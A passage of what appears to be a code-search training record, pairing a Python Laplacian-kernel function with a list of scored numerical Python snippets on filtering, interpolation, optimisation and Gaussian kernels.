cp.Variable(n_periods)\r\n lambd = cp.Parameter(nonneg=True)\r\n lambd.value = lambda_value\r\n\r\n def lasso_min(betas, rets, lambd):\r\n return cp.norm(rets-betas, 2)**2 + lambd*cp.norm(cp.matmul(D, betas), 1)\r\n\r\n problem = cp.Problem(cp.Minimize(lasso_min(beta, rets, lambd)))\r\n problem.solve()\r\n\r\n # NOT WORKING\r\n # n_periods = rets_data.shape[0]\r\n # D_full = np.diag([1] * n_periods) - np.diag([1] * (n_periods - 1), 1)\r\n # D = D_full[0:n_periods - 1, ]\r\n # def lasso_min(betas, rets, D, lambda_value):\r\n # return np.linalg.norm(rets-betas)**2 + lambda_value*np.linalg.norm(D@betas,1)\r\n #\r\n # init_guess = np.repeat(1/n_periods, n_periods)\r\n # bounds = Bounds(lb=0.0, ub=1.0)\r\n # results = minimize(fun=lasso_min,\r\n # args=(rets_data, D, lambda_value),\r\n # x0=init_guess,\r\n # bounds=bounds,\r\n # method='SLSQP',\r\n # options={'disp':False})\r\n # betas = pd.Series(results.x, index=rets_data.index)\r\n # return betas\r\n betas = pd.DataFrame(beta.value, index=rets_data.index.to_timestamp(), columns=['drift'])\r\n return betas", "def _get_coeffs(self):\n # lift (Clmax) and parasitic drag (Cd0max)\n self.cl = 0.0\n self.cd = 0.0\n kpp = 0.0\n\n for sail in self.sails:\n\n self.cl += sail.cl(self.awa) * sail.area * sail.bk\n self.cd += sail.cd(self.awa) * sail.area * sail.bk\n kpp += sail.cl(self.awa) ** 2 * sail.area * sail.bk * sail.kp\n\n self.cl /= self.area\n self.cd /= self.area\n\n # viscous quadratic parasitic drag and induced drag\n devisor_1 = self.area * self.cl ** 2\n devisor_2 = np.pi * self._heff(self.awa) ** 2\n self.CE = (kpp / devisor_1 if devisor_1 else 0.0) + (self.area / devisor_2 if devisor_2 else 0.0)\n\n # fraction of parasitic drag due to jib\n self.fcdj = 0.0\n for sail in self.sails:\n if sail.type == \"jib\":\n self.fcdj = (\n sail.bk * sail.cd(self.awa) * sail.area / (self.cd * self.area)\n )\n\n # final lift and drag\n self.cd = self.cd * (\n self.flat * self.fcdmult(self.flat) * self.fcdj + (1 - self.fcdj)\n ) + self.CE * self.cl ** 2 * self.flat ** 2 * self.fcdmult(self.flat)\n self.cl = self.flat * self.cl", "def filter_gradient(self):\n error = self.error()\n error_shape = error.shape[1:3]\n input_ = self.get_cache('input')\n h = input_.shape[1]\n w = input_.shape[2]\n # TODO: check that this padding is correct. I am not sure it gets it right when the number of 0s to add is odd.\n pad_l, pad_t = (error_shape[0] - 1) // 2, (error_shape[1] - 1) // 2\n pad_r, pad_b = (error_shape[0] - 1) - pad_l, (error_shape[1] - 1) - pad_t\n padded_input = np.pad(input_, ((0, 0), (pad_l, pad_r), (pad_t, pad_b), (0, 0)), 'constant')\n # TODO: this assumes 'same' padding. support other types.\n # TODO: I wanted to use np.from_function but kept getting an IndexError, so we'll use a nested for loop for now\n grads = np.zeros(self.filter.shape)\n for m in range(grads.shape[0]):\n for n in range(grads.shape[1]):\n for k in range(grads.shape[2]):\n for r in range(grads.shape[3]):\n grads[m, n, k, r] = np.sum(error[:, :, :, r] * padded_input[:, m: m + h, n: n + w, k])\n return grads", "def pchip_coeffs_1_nonan(X, Y):\n\n return _pchip_coeffs_1(X, Y, 0, X.size)", "def LEIsotropic2D(self):\n const = self.ymod / ((1+self.Nu) * (1-(2*self.Nu)))\n a = const * self.Nu\n b = const * (1-self.Nu)\n c = const * 0.5 * (1-2*self.Nu)\n Cmat = np.array(\n [\n [b, a, 0],\n [a, b, 0],\n [0, 0, c],\n ], dtype=float)\n stress_el = Cmat @ self.eps\n return stress_el, Cmat", "def l1(weights):\n\treturn np.sum(np.abs(weights))", "def lfilter(taps, array, filter_centre):\n arr = array.copy()\n left_pad_len = len(taps) - filter_centre - 1\n right_pad_len = filter_centre\n arr = np.concatenate(\n (array[1:1+left_pad_len][::-1], array,\n array[-right_pad_len-1:-1][::-1]))\n return np.convolve(arr, taps[::-1], 'valid')", "def _corr1d_0(input, filter, output, wrap=True, cval=0.0):\n #3 loops: rows, cols, filter along rows\n rows, cols = input.shape\n N = len(filter)\n n = N//2\n #access scans whole col of output at once for better cache coherency\n for r in range(rows):\n for c in prange(cols):\n output[r,c] = 0\n for i in range(N):\n j = r-n+i\n if wrap:\n j %= rows\n if j >= 0 and j < rows:\n output[r,c] += input[j,c]*filter[i]\n else:\n output[r,c] += cval*filter[i]\n return output", "def coeffs(f):\n return dmp_coeffs(f.rep, f.lev, f.dom)", "def coefficients(self) -> np.ndarray:\n return self._coefficients", "def _pchip_coeffs_i(X, Y, i):\n\n # Pre-assign sizes for PCHIP variables.\n h = [0.0, 0.0, 0.0]\n δ = [0.0, 0.0, 0.0]\n d = [0.0, 0.0]\n\n # Check whether x is adjacent to the start or end of this X\n at_start = (i == 0) or np.isnan(X[i - 1] + Y[i - 1])\n at_end = (i == len(X) - 2) or np.isnan(X[i + 2] + Y[i + 2])\n\n if at_start and at_end:\n\n # if np.isnan(X[i + 1]) or np.isnan(Y[i + 1]):\n # # Only one valid data point. Leave the interpolant as NaN.\n # d[0], c, b = np.nan, np.nan, np.nan\n\n # else:\n\n # ||| X[0] <= x <= X[1] ||| Revert to Linear Interpolation\n # If actually only one non-NaN data point, then d[0] will be NaN, so\n # interpolant will evaluate to NaN.\n d[0] = (Y[i + 1] - Y[i]) / (X[i + 1] - X[i])\n C3, C2 = 0.0, 0.0\n\n else:\n if at_start:\n # ||| X[0] <= x <= X[1] < X[2] --->\n h[1] = X[i + 1] - X[i]\n h[2] = X[i + 2] - X[i + 1]\n δ[1] = (Y[i + 1] - Y[i]) / h[1]\n δ[2] = (Y[i + 2] - Y[i + 1]) / h[2]\n\n # Noncentered, shape-preserving, three-point formula:\n d[0] = ((2.0 * h[1] + h[2]) * δ[1] - h[1] * δ[2]) / (h[1] + h[2])\n if np.sign(d[0]) != np.sign(δ[1]):\n d[0] = 0.0\n elif (np.sign(δ[1]) != np.sign(δ[2])) and (\n np.abs(d[0]) > np.abs(3.0 * δ[1])\n ):\n d[0] = 3.0 * δ[1]\n\n # Standard PCHIP formula\n if np.sign(δ[1]) * np.sign(δ[2]) > 0.0:\n w1 = 2.0 * h[2] + h[1]\n w2 = h[2] + 2.0 * h[1]\n d[1] = (w1 + w2) / (w1 / δ[1] + w2 / δ[2])\n else:\n d[1] = 0.0\n\n elif at_end:\n # <--- X[i-1] < X[i] < x <= X[i+1] |||\n h[0] = X[i] - X[i - 1]\n h[1] = X[i + 1] - X[i]\n δ[0] = (Y[i] - Y[i - 1]) / h[0]\n δ[1] = (Y[i + 1] - Y[i]) / h[1]\n\n # Standard PCHIP formula\n if np.sign(δ[0]) * np.sign(δ[1]) > 0.0:\n w1 = 2.0 * h[1] + h[0]\n w2 = h[1] + 2.0 * h[0]\n d[0] = (w1 + w2) / (w1 / δ[0] + w2 / δ[1])\n else:\n d[0] = 0.0\n\n # Noncentered, shape-preserving, three-point formula:\n d[1] = ((h[0] + 2.0 * h[1]) * δ[1] - h[1] * δ[0]) / (h[0] + h[1])\n if np.sign(d[1]) != np.sign(δ[1]):\n d[1] = 0.0\n elif (np.sign(δ[1]) != np.sign(δ[0])) and (\n np.abs(d[1]) > np.abs(3 * δ[1])\n ):\n\n d[1] = 3.0 * δ[1]\n\n else:\n # <--- X[i-1] < X[i] < x <= X[i+1] < X[i+2] --->\n h[0] = X[i] - X[i - 1] # Way faster to do this\n h[1] = X[i + 1] - X[i] # than\n h[2] = X[i + 2] - X[i + 1] # diff(X(i-1:i+3))\n δ[0] = (Y[i] - Y[i - 1]) / h[0]\n δ[1] = (Y[i + 1] - Y[i]) / h[1]\n δ[2] = (Y[i + 2] - Y[i + 1]) / h[2]\n\n # Standard PCHIP formula\n for j in range(2):\n if np.sign(δ[j]) * np.sign(δ[j + 1]) > 0.0:\n w1 = 2.0 * h[j + 1] + h[j]\n w2 = h[j + 1] + 2.0 * h[j]\n d[j] = (w1 + w2) / (w1 / δ[j] + w2 / δ[j + 1])\n else:\n d[j] = 0.0\n\n # Polynomial coefficients for this piece\n dzzdx = (δ[1] - d[0]) / h[1]\n dzdxdx = (d[1] - δ[1]) / h[1]\n C3 = (dzdxdx - dzzdx) / h[1] # coeff of the 3rd degree term (x^3)\n C2 = 2 * dzzdx - dzdxdx # coeff of 2nd degree term (x^2)\n\n # The following code evaluates the `d`'th deriviative of the cubic\n # interpolant at `x`.\n # s = x - X[i]\n # if d == 0:\n # y = Y[i] + s * (d[0] + s * (C2 + s * C3))\n # elif d == 1: # first derivative\n # y = d[0] + s * (2 * C2 + 3 * s * C3)\n # elif d == 2: # second derivative\n # y = 2 * C2 + 6 * s * C3\n # elif d == 3: # third derivative\n # y = 6 * C3\n # else:\n # y = 0.0\n # return y\n\n # Faster to return tuple than build an np.array just to deconstruct it later\n return C3, C2, d[0], Y[i]", "def waverec(coeffs: list, wavelet: pywt.Wavelet) -> torch.Tensor:\n _, _, rec_lo, rec_hi = get_filter_tensors(\n wavelet, flip=False, device=coeffs[-1].device,\n dtype=coeffs[-1].dtype\n )\n filt_len = rec_lo.shape[-1]\n filt = torch.stack([rec_lo, rec_hi], 0)\n\n res_lo = coeffs[0]\n for c_pos, res_hi in enumerate(coeffs[1:]):\n res_lo = torch.stack([res_lo, res_hi], 1)\n res_lo = torch.nn.functional.conv_transpose1d(\n res_lo, filt, stride=2).squeeze(1)\n\n # remove the padding\n padl = (2 * filt_len - 3) // 2\n padr = (2 * filt_len - 3) // 2\n if c_pos < len(coeffs) - 2:\n pred_len = res_lo.shape[-1] - (padl + padr)\n nex_len = coeffs[c_pos + 2].shape[-1]\n if nex_len != pred_len:\n padr += 1\n pred_len = res_lo.shape[-1] - (padl + padr)\n assert (\n nex_len == pred_len\n ), \"padding error, please open an issue on github \"\n if padl > 0:\n res_lo = res_lo[..., padl:]\n if padr > 0:\n res_lo = res_lo[..., :-padr]\n return res_lo", "def PrewittGradient(anImage):\n XKernel = [\n [-1,0,1],\n [-1,0,1],\n [-1,0,1]\n ]\n YKernel = [\n [-1,-1,-1],\n [0,0,0],\n [1,1,1]\n ]\n return ApplyGradientKernels(anImage, XKernel, YKernel)", "def l1(P, q):\n\n m, n = P.size\n\n # Solve equivalent LP \n #\n # minimize [0; 1]' * [u; v]\n # subject to [P, -I; -P, -I] * [u; v] <= [q; -q]\n #\n # maximize -[q; -q]' * z \n # subject to [P', -P']*z = 0\n # [-I, -I]*z + 1 = 0 \n # z >= 0 \n \n c = matrix(n*[0.0] + m*[1.0])\n h = matrix([q, -q])\n\n def Fi(x, y, alpha = 1.0, beta = 0.0, trans = 'N'): \n if trans == 'N':\n # y := alpha * [P, -I; -P, -I] * x + beta*y\n u = P*x[:n]\n y[:m] = alpha * ( u - x[n:]) + beta*y[:m]\n y[m:] = alpha * (-u - x[n:]) + beta*y[m:]\n\n else:\n # y := alpha * [P', -P'; -I, -I] * x + beta*y\n y[:n] = alpha * P.T * (x[:m] - x[m:]) + beta*y[:n]\n y[n:] = -alpha * (x[:m] + x[m:]) + beta*y[n:]\n\n\n def Fkkt(W): \n\n # Returns a function f(x, y, z) that solves\n #\n # [ 0 0 P' -P' ] [ x[:n] ] [ bx[:n] ]\n # [ 0 0 -I -I ] [ x[n:] ] [ bx[n:] ]\n # [ P -I -W1^2 0 ] [ z[:m] ] = [ bz[:m] ]\n # [-P -I 0 -W2 ] [ z[m:] ] [ bz[m:] ]\n #\n # On entry bx, bz are stored in x, z.\n # On exit x, z contain the solution, with z scaled (W['di'] .* z is\n # returned instead of z). \n\n d1, d2 = W['d'][:m], W['d'][m:]\n D = 4*(d1**2 + d2**2)**-1\n A = P.T * spdiag(D) * P\n lapack.potrf(A)\n\n def f(x, y, z):\n\n x[:n] += P.T * ( mul( div(d2**2 - d1**2, d1**2 + d2**2), x[n:]) \n + mul( .5*D, z[:m]-z[m:] ) )\n lapack.potrs(A, x)\n\n u = P*x[:n]\n x[n:] = div( x[n:] - div(z[:m], d1**2) - div(z[m:], d2**2) + \n mul(d1**-2 - d2**-2, u), d1**-2 + d2**-2 )\n\n z[:m] = div(u-x[n:]-z[:m], d1)\n z[m:] = div(-u-x[n:]-z[m:], d2)\n\n return f\n\n\n # Initial primal and dual points from least-squares solution.\n\n # uls minimizes ||P*u-q||_2; rls is the LS residual.\n uls = +q\n lapack.gels(+P, uls)\n rls = P*uls[:n] - q \n\n # x0 = [ uls; 1.1*abs(rls) ]; s0 = [q;-q] - [P,-I; -P,-I] * x0\n x0 = matrix( [uls[:n], 1.1*abs(rls)] ) \n s0 = +h\n Fi(x0, s0, alpha=-1, beta=1) \n\n # z0 = [ (1+w)/2; (1-w)/2 ] where w = (.9/||rls||_inf) * rls \n # if rls is nonzero and w = 0 otherwise.\n if max(abs(rls)) > 1e-10: \n w = .9/max(abs(rls)) * rls\n else: \n w = matrix(0.0, (m,1))\n z0 = matrix([.5*(1+w), .5*(1-w)])\n\n dims = {'l': 2*m, 'q': [], 's': []}\n sol = solvers.conelp(c, Fi, h, dims, kktsolver = Fkkt, \n primalstart={'x': x0, 's': s0}, dualstart={'z': z0})\n return sol['x'][:n]", "def grad_chol(L):\n n = len(L)\n I = np.eye(n)\n s1 = I[:, None, :, None] * L[None, :, None, :]\n s2 = I[None, :, :, None] * L[:, None, None, :]\n return (s1 + s2).reshape(2 * (n**2,))", "def smooth_wcoeffs(coeffs,order=1):\n from copy import deepcopy\n coeffs_new=deepcopy(coeffs)\n\n for j in range(1,order+1):\n # create a list of three zero arrays\n czero=tuple(zeros(coeffs[-j][i].shape) for i in range(3))\n # to replace detailed coeffs with zeros\n coeffs_new[-j]=czero\n\n return coeffs_new", "def linear_coefficient(self):\n if self._epsilon.size == 1:\n return np.full((cfg.Nx, cfg.Ny), self._epsilon.get_h(), dtype = cfg.dtype)\n else:\n return self._epsilon.get_h()", "def kalman_filter1(old_state, new_state, input_valid = True):\n state = np.zeros(6)\n if input_valid:\n state[0:3] = POS_COEF1 * new_state \\\n + (1 - POS_COEF1) * (old_state[0:3] + old_state[3:6] * TIME_INTERVAL)\n # print new_state, old_state[0:3]\n friction = -FRICTION*np.linalg.norm(old_state[3:6])*old_state[3:6]\n state[3:6] = VEL_COEF1 * (new_state - old_state[0:3]) / TIME_INTERVAL \\\n + (1 - VEL_COEF1) * (old_state[3:6] - (GRAVITY - friction) * TIME_INTERVAL)\n else:\n state[0:3] = old_state[0:3] + old_state[3:6] * TIME_INTERVAL\n friction = -FRICTION*np.linalg.norm(old_state[3:6])*old_state[3:6]\n state[3:6] = old_state[3:6] - (GRAVITY - friction) * TIME_INTERVAL\n return state", "def get_cl(self, lbins, w=None):\n return spec.rcfft2cl(lbins, self, w=w)", "def calc_xi(self):\n\t\n\tk_dot_x = self.k[0]*self.x[0,:,:] + self.k[1]*self.x[1,:,:] + self.k[2]*self.x[2,:,:]\n\n\tself.xi = self.t.reshape((1,self.N)) - k_dot_x/l.Clight\n\n\treturn" ]
[ "0.63450897", "0.59707314", "0.56549406", "0.5654393", "0.56457824", "0.5604039", "0.55629796", "0.554021", "0.55173355", "0.55153257", "0.54377836", "0.54277223", "0.5426681", "0.53971505", "0.538953", "0.5377202", "0.5352815", "0.53502446", "0.534966", "0.53384006", "0.53195107", "0.5297331", "0.52960753", "0.528895", "0.52801204", "0.52752084", "0.5237084", "0.52356946", "0.5234762", "0.522277", "0.5221076", "0.5212501", "0.5207456", "0.5198997", "0.5197461", "0.51961046", "0.5181431", "0.518138", "0.5169238", "0.5160548", "0.51600873", "0.51551867", "0.5153356", "0.51512206", "0.5146969", "0.51285857", "0.512726", "0.51248527", "0.51231694", "0.51131725", "0.51125926", "0.5109612", "0.5104538", "0.5102355", "0.5092578", "0.50923747", "0.5086925", "0.50788486", "0.5077776", "0.5073715", "0.5068982", "0.5061277", "0.5059737", "0.5041988", "0.5038093", "0.50327677", "0.5029589", "0.5028063", "0.5026769", "0.502567", "0.5013065", "0.50105417", "0.5004689", "0.5002814", "0.50012183", "0.50004584", "0.49971527", "0.4997029", "0.49968618", "0.4991438", "0.499074", "0.4990654", "0.49888206", "0.4987236", "0.49813083", "0.49776784", "0.49773216", "0.49729234", "0.4972047", "0.4969153", "0.49675488", "0.49662563", "0.49571362", "0.49385992", "0.49384007", "0.4933243", "0.49314108", "0.49282423", "0.4927564", "0.49218798", "0.49214894" ]
0.0
-1
r"""Function that returns Gaussian filter matrix coefficients.
def get_laplacian_kernel2d(kernel_size: int) -> torch.Tensor: if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \ kernel_size <= 0: raise TypeError("ksize must be an odd positive integer. Got {}" .format(kernel_size)) kernel = torch.ones((kernel_size, kernel_size)) mid = kernel_size // 2 kernel[mid, mid] = 1 - kernel_size ** 2 kernel_2d: torch.Tensor = kernel return kernel_2d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _gaussian(self, c, sigma):\n d = 2*sigma*sigma\n ax = exp(-power(self._xx-self._xx.T[c], 2)/d)\n ay = exp(-power(self._yy-self._yy.T[c], 2)/d)\n return (ax * ay).T # the external product gives a matrix", "def apply_gaussian(X, sigma):\n return np.array([ndimage.gaussian_filter(x, sigma) for x in X])", "def gaussian_filter(x):\n return _gaussian_filter(x, 3)", "def _gaussian_distribution(self, x: ndarray, mu: float, sigma: float) -> ndarray:\n return 1 / (np.sqrt(2 * np.pi) * sigma) * np.exp(\n -np.power(\n (x - mu) / sigma, 2) / 2)", "def compute_gaussian_krnl(self, M):\n g = signal.gaussian(M, M // 3., sym=True)\n G = np.dot(g.reshape(-1, 1), g.reshape(1, -1))\n G[M // 2:, :M // 2] = -G[M // 2:, :M // 2]\n G[:M // 2, M // 2:] = -G[:M // 2, M // 2:]\n return G", "def gaussian_weight_matrix(dispersion, L):\n return np.exp(-0.5*(dispersion[:,None]-dispersion[None,:])**2/L**2)", "def estimate_multi_gaussian(X):\n m, n = X.shape\n mu = mean(X, axis=0)\n sigma = cov_matrix(X, mu)\n\n return mu, sigma", "def estimate_gaussian_params(X):\n mu = X.mean(axis=0)\n var = X.std(axis=0)**2.0\n return mu,var", "def multi_gaussian(X, mu, sigma):\n m, n = X.shape\n X = X - mu\n\n factor = X.dot(inv(sigma))\n factor = multiply(factor, X)\n factor = - (1 / 2) * sum(factor, axis=1, keepdims=True)\n\n p = 1 / (power(2 * pi, n / 2) * sqrt(det(sigma)))\n p = p * exp(factor)\n\n return p", "def gmm(X, k):\n mix = sklearn.mixture.GaussianMixture(n_components=k).fit(X)\n pi = mix.weights_\n m = mix.means_\n S = mix.covariances_\n clss = mix.predict(X)\n bic = mix.bic(X)\n\n return pi, m, S, clss, bic", "def gaussian_kernel_matrix(x, y, sigmas):\n\n beta = 1. / (2. * (tf.expand_dims(sigmas, 1)))\n norm = lambda x: tf.reduce_sum(tf.square(x), 1)\n dist = tf.transpose(norm(tf.expand_dims(x, 2) - tf.transpose(y)))\n s = tf.matmul(beta, tf.reshape(dist, (1, -1)))\n return tf.reshape(tf.reduce_sum(tf.exp(-s), 0), tf.shape(dist))", "def estimateGaussian(X):\n mu = X.mean(0, keepdims=True).T\n sigma2 = X.var(0, keepdims=True).T\n return mu, sigma2", "def productGaussian(mu1, C1, mu2, C2):\n Cn = C1 + mat(.0001*identity(2))\n K = Cn*linalg.inv(Cn+C2)\n mu = mu1 + K*(mu2-mu1)\n C = Cn - K*Cn\n #denom = linalg.inv(C1+C2)\n #mu = denom*(C1*mu2+C2*mu1)\n #C = C1*denom*C2\n return mu,C", "def estimateGaussian(X):\n\tmu = np.mean(X, axis=0)\n\tsigma2 = np.std(X, axis=0) ** 2\n\treturn mu, sigma2", "def _gaussian_kernel_matrix(x, y, sigmas):\n def norm(v):\n return tf.reduce_sum(tf.square(v), 1)\n beta = 1. / (2. * (tf.expand_dims(sigmas, 1)))\n dist = tf.transpose(norm(tf.expand_dims(x, 2) - tf.transpose(y)))\n s = tf.matmul(beta, tf.reshape(dist, (1, -1)))\n kernel = tf.reshape(tf.reduce_sum(tf.exp(-s), 0), tf.shape(dist))\n return kernel", "def _make_gaussian_matrix(\n data_count: int,\n feature_count: int,\n) -> np.ndarray:\n return np.random.randn(data_count, feature_count)", "def all_features(sigma=0.1):\n # to fill in f, array of features w shape (863, 863)\n f = np.zeros((X.shape[0], X.shape[0]))\n # iterate over every example twice to make every possible comparison\n for i in range(m):\n for j in range(m):\n f[i, j] = gaussian_kernel(X[i], X[j], sigma=sigma)\n return f", "def makeGaussianKernel(sigma: float) -> np.ndarray:\n\n # Your code here.\n kernel_size = 8*sigma+1\n kernel = np.zeros([kernel_size,kernel_size], dtype=float)\n center = kernel_size//2\n \n \n s = 2*(sigma**2)\n sum_val = 0\n for i in range(0,kernel_size):\n for j in range(0,kernel_size):\n x = i-center\n y = j-center\n kernel[i,j] = np.exp(-(x**2+y**2) / s)\n sum_val += kernel[i,j]\n #/(np.pi * s)\n sum_val = 1/sum_val\n print(\"here is the kernel\", kernel*sum_val)\n return kernel*sum_val", "def gaussian(x, amp, wid, cen):\n return amp*np.exp(-(x-cen)**2/(2*wid**2))", "def Gaussian(x, mu=0, sigma=26.4, A=1, y0=0):\r\n #width = sigma*(2*np.sqrt(2*np.log(2)))\r\n b = 1/(sigma*np.sqrt(2*np.pi))\r\n f = b*np.power(np.e, -(((x-mu)**2)/(2*sigma**2)))\r\n return A*f + y0", "def gaussian_kernel_matrix(x, y, sigmas):\n\n beta = 1. / (2. * (tf.expand_dims(sigmas, 1)))\n norm = lambda x: tf.reduce_sum(input_tensor=tf.square(x), axis=1)\n dist = tf.transpose(a=norm(tf.expand_dims(x, 2) - tf.transpose(a=y)))\n s = tf.matmul(beta, tf.reshape(dist, (1, -1)))\n return tf.reshape(tf.reduce_sum(input_tensor=tf.exp(-s), axis=0), tf.shape(input=dist))", "def fit_gaussian(self, mask=None):\n data = self.data\n mask = numpy.logical_or(mask, numpy.ma.getmaskarray(data))\n fdata = data[~mask].data\n xdata = numpy.asarray([cm[~mask]\n for cm in self.bset.cmesh]).transpose()\n scale, mean, cov = fit_ndgaussian(xdata, fdata)\n return scale, mean, cov", "def gaussian_filter(size,sigma=-1):\n\n if sigma == -1:\n sigma = np.sqrt(size)\n\n filter = np.zeros((size,size))\n\n for i,j in it.product(range(size),range(size)):\n x = j-size//2\n y = i-size//2\n filter[i,j] = 1/(2*np.pi*sigma**2) * np.exp(-(x**2+y**2)/(2*sigma**2))\n\n filter = filter/filter[0,0]\n filter = filter/filter.sum()\n\n return filter", "def create_gaussian_filter(size, sigma):\n h = size[0] #height of the template\n w = size[1] #width of the template \n if h % 2 == 0: h += 1 #add 1 if dimensions are even\n if w % 2 == 0: w += 1\n x = math.floor(h/2)\n y = math.floor(w/2) \n sum = 0\n #create our template\n template = np.zeros((h,w))\n #fill the template in with the numbers from Gaussian distribution\n for i in range(h):\n for j in range(w):\n template[i,j] = math.exp(-((((j-x)**2)+((i-y)**2))/(2*(sigma**2))))\n sum = sum + template[i,j]\n #normalise the numbers\n gaussian_filter = template/sum\n return gaussian_filter", "def uni_gaussian(X, mu, sigma2):\n p = (1 / sqrt(2 * pi * sigma2))\n p = p * exp(-power(X - mu, 2) / (2 * sigma2))\n\n def prod(x, y):\n return x * y\n p = array([[reduce(prod, el)] for el in p])\n\n return p", "def fitgaussian(self, data):\n params = self.moments(data)\n errorfunction = lambda p: ravel(self.Gauss(*p)(*indices(data.shape)) - data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def _multivariate_gaussian(self, x, mu_k, sigma_k):\n return multivariate_normal.pdf(x, mu_k, sigma_k)", "def build_filter(n, sigma):\n filter_ = np.zeros((n,n))\n\n begin = n//2\n\n for i in range(n):\n for j in range(n):\n val = ((i-begin)**2 + (j-begin)**2)**0.5\n filter_[i][j] = gaussian(val, sigma)\n\n return filter_", "def gaussian(x, mu, sigma):\n return (np.exp(-(x - mu)**2 / 2.0 / sigma**2) /\n np.sqrt(2.0 * np.pi) / sigma)", "def gaussian(pars, x):\n A, b, mu, sigma = pars\n # return b + A/(np.sqrt(2*np.pi)*sigma**2) \\\n return b + A \\\n * np.exp(-.5*(x - mu)**2/sigma**2)", "def gaussian(x, amp, cen, wid):\n return amp * exp (-(x-cen)**2/(2*wid**2))", "def Gaussian_priors_func(guesses,central,invvar):\n return [-0.5 * np.dot(np.dot((guesses[i]-central[i]).T,invvar[i]),guesses[i]-central[i]) for i in range(len(central))]", "def gaussian(dims: Tuple[int, int], cutoff_freq: float) -> np.ndarray:\n # create grid\n m, n = [(dim - 1) / 2 for dim in dims]\n yy, xx = np.ogrid[-m : m + 1, -n : n + 1]\n\n # compute transfer function\n tf = np.exp(-(np.power(xx, 2) + np.power(yy, 2)) / (2 * np.power(cutoff_freq, 2)))\n\n # normalize and return transfer func\n return (tf - np.max(tf)) / (np.max(tf) - np.min(tf))", "def kernel_gaussiano(image: np.ndarray, sigma: float, kind: str = 'low') -> np.ndarray:\n U, V = fourier_meshgrid(image)\n D = fourier_distance(U, V)\n H = np.exp( (-1.0 * D) / (2.0 * sigma**2) )\n \n if kind == 'high' or kind == 'highpass':\n H = 1.0 - H\n \n return H", "def test_gaussian_filter():\n\n def rgb2gray(rgb):\n r, g, b = rgb[:, :, 0], rgb[:, :, 1], rgb[:, :, 2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n\n return gray\n\n img = rgb2gray(np.array(Image.open('data/graf.png')))\n gx, x = gauss_module.gauss(4)\n gx = gx.reshape(1, gx.shape[0])\n gy = gx.reshape(gx.shape[1], gx.shape[0])\n smooth_img = conv2(img, gx * np.array(gy))\n\n test_smooth_img = gauss_module.gaussianfilter(img, 4)\n\n assert np.all(smooth_img.round(5) == test_smooth_img.round(5))", "def Gauss_filter(data, sigma=(0,2,2), mode='wrap'): \n import scipy.ndimage.filters as flt\n return flt.gaussian_filter(data, sigma=sigma, mode=mode)", "def gaussian_blur(self,img):\n return cv2.GaussianBlur(img, (self.kernel_size, self.kernel_size), 0)", "def gaussian2d(filter_size=5, sig=1.0):\n ax = np.arange(-filter_size // 2 + 1., filter_size // 2 + 1.)\n xx, yy = np.meshgrid(ax, ax)\n kernel = np.exp(-0.5 * (np.square(xx) + np.square(yy)) / np.square(sig))\n return kernel / np.sum(kernel)", "def nGaussianCen(p, x, mu):\n # 2013-05-06 20:29 IJMC: Created\n\n x = array(x, dtype=float, copy=False)\n ret = np.zeros(x.size)\n ngaussians = int(len(p)/2)\n for ii in xrange(ngaussians):\n ret += gaussian([p[ii*2], p[ii*2+1], mu[ii], 0], x)\n if len(p)/2.<>len(p)/2: # P is odd, so the last value is our\n ret += p[-1] # additive constant.\n\n return ret", "def generateCoefficients (self):\n\t\tself.ws = []\n\t\tif not self.sine:\n\t\t\tself.bs = []\n\t\tmean = np.zeros(self.dim)\n\t\tcov = np.eye(self.dim)*(2*self.gammak)\n\n\t\tif self.sine:\n\t\t\tfor _ in range(self.rn):\n\t\t\t\tself.ws.append(nr.multivariate_normal(mean, cov))\n\t\telse:\n\t\t\tfor _ in range(self.rn):\n\t\t\t\tself.ws.append(nr.multivariate_normal(mean, cov))\n\t\t\t\tself.bs.append(nr.uniform(0.0, 2*np.pi))", "def gauss_convolve(array, sigma):\r\n\t##remove singleton dimesions and make sure values are floats\r\n\tarray = array.squeeze().astype(float)\r\n\t##allocate memory for result\r\n\tresult = np.zeros(array.shape)\r\n\t##if the array is 2-D, handle each trial separately\r\n\ttry:\r\n\t\tfor trial in range(array.shape[1]):\r\n\t\t\tresult[:,trial] = gaussian_filter(array[:, trial], sigma = sigma, order = 0, mode = \"constant\", cval = 0.0)\r\n\t##if it's 1-D:\r\n\texcept IndexError:\r\n\t\tif array.shape[0] == array.size:\r\n\t\t\tresult = gaussian_filter(array, sigma = sigma, order = 0, mode = \"constant\", cval = 0.0)\r\n\t\telse:\r\n\t\t\tprint \"Check your array dimenszions!\"\r\n\treturn result", "def gaussianKM (X, P, gamma):\n X = np.matrix(X)\n P = np.matrix(P)\n m, n = X.shape\n p, n = P.shape\n\n XPt = X * P.T\n D1 = np.diag(X * X.T).reshape(m, 1)\n D1 = np.matrix(np.repeat(D1, p, axis=1))\n D2 = np.diag(P * P.T).reshape(p, 1)\n D2 = np.matrix(np.repeat(D2, m, axis=1))\n D2 = D2.T\n\n KM = D1 + D2 - 2 * XPt\n return np.exp (-gamma * KM)", "def doubleGaussianCen(p, x, mu1, mu2):\n # 2013-05-06 20:29 IJMC: Created\n\n x = array(x, dtype=float, copy=False)\n param1 = [p[0], p[1], mu1, 0]\n if len(p)==4:\n param2 = [p[2], p[3], mu2, 0]\n elif len(p)==5:\n param2 = [p[2], p[3], mu2, p[4]]\n\n return gaussian(param1, x) + gaussian(param2, x)", "def gaussian_filter(self, sigma):\n\n mask = self.get_weighted_mask()\n mask_f = ni.gaussian_filter(mask, sigma=sigma)\n\n return SpatialReceptiveField(mask_f, self.altPos, self.aziPos, sign=self.sign,\n temporalWindow=self.temporalWindow, pixelSizeUnit=self.pixelSizeUnit,\n dataType=self.dataType, thr=self.thr, filter_sigma=sigma,\n interpolate_rate=self.interpolate_rate)", "def coefficients(dataset):\r\n x = [row[0] for row in dataset]\r\n y = [row[1] for row in dataset]\r\n x_mean, y_mean = mean(x), mean(y)\r\n b1 = covariance(x, x_mean, y, y_mean) / variance(x, x_mean)\r\n b0 = y_mean - b1 * x_mean\r\n return [b0, b1]", "def GaussianKernel(radius, std):\n size = 2 * radius + 1\n weight = torch.ones(size, size)\n weight.requires_grad = False\n for i in range(-radius, radius+1):\n for j in range(-radius, radius+1):\n dis = (i * i) + (j * j)\n weight[i+radius][j+radius] = np.exp(-dis / (2 * std * std))\n weight = weight / 